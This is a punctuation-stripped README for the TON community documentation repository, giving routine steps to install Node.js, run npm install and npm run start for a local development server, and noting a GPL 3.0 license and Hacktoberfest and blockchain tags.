https github com ton community ton docs local default way 1 download repository from github 2 install last version nodejs lts https nodejs org en download to run local build 3 open terminal in project directory 4 install dependencies with command npm install 5 run project with command npm run start this command starts a local development server and opens up a browser window most changes are reflected live without having to restart the server license gpl 3 0 https choosealicense com licenses gpl 3 0
docs ton hacktoberfest hack-ton-berfest
blockchain